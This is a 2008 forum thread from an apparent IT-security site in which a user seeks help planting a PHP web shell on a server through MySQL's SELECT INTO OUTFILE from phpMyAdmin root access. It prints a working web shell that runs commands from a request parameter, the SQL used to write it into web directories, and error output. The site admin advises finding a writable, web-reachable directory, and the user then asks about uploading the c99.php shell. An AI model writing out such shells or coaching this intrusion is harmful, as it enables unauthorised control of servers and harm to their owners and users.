 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 90
 Members: 0
 Total: 90
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
INTO OUTFILE How it work ? |
|
 Posted: Thu Apr 10, 2008 9:36 pm |
 |
|
| clubreseau |
| Advanced user |
 |
|
| Joined: Apr 10, 2008 |
| Posts: 128 |
|
|
|
 |
|
 |
|
i try
SELECT INTO OUTFILE('/home/ftpadmin/jokes/') from ('c:\shell.php');
not working, im trying to upload my shell in webroot directory.
im in phpadmin root. |
|
|
|
|
|
|
|
|
| Posted: Thu Apr 10, 2008 10:15 pm |
|
|
| clubreseau |
| Advanced user |
|
|
| Joined: Apr 10, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
i try this, I create a table test and in i put
| Code: |
<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>
|
After i Do
| Quote: |
SELECT * INTO OUTFILE '/home/ftpadmin/jokes/phpmyadmin/phpinfo.php' from test;
|
And I Receive
| Quote: |
#1086 - File '/home/ftpadmin/jokes/phpmyadmin/phpinfo.php' already exists
|
I Try
| Quote: |
SELECT * INTO OUTFILE '/home/ftpadmin/jokes/phpmyadmin/test.php' from test;
|
And i receive
| Quote: |
#1 - Can't create/write to file '/home/ftpadmin/jokes/phpmyadmin/test.php' (Errcode: 13)
|
Someone can help me with This
Thank ! |
|
|
|
|
|
|
|
|
| Posted: Thu Apr 10, 2008 10:29 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
This is exactly how "INTO OUTFILE" suppose to work - it will not overwrite existing files and it can't write files to directory, which is not world-writable (or owner == MySql UID/GID).
So only solution is to find writable directory, which later can be accessed from web  |
|
|
|
|
| Posted: Thu Apr 10, 2008 10:42 pm |
|
|
| clubreseau |
| Advanced user |
|
|
| Joined: Apr 10, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
ok i foud another directory where i can upload a shell
the problem is i cant do cd .. to go to the previous directory im alway in the dir where i upload the shell.
why ? |
|
|
|
|
| Posted: Thu Apr 10, 2008 11:03 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
So you can now execute shell commands?
Not working?
Try:
Can you list "/tmp" directory?
What username and UID you currently have? www? apache? nobody? |
|
|
|
|
| Posted: Fri Apr 11, 2008 12:57 am |
|
|
| clubreseau |
| Advanced user |
|
|
| Joined: Apr 10, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
| how i can upload c99.php with cmd ? |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
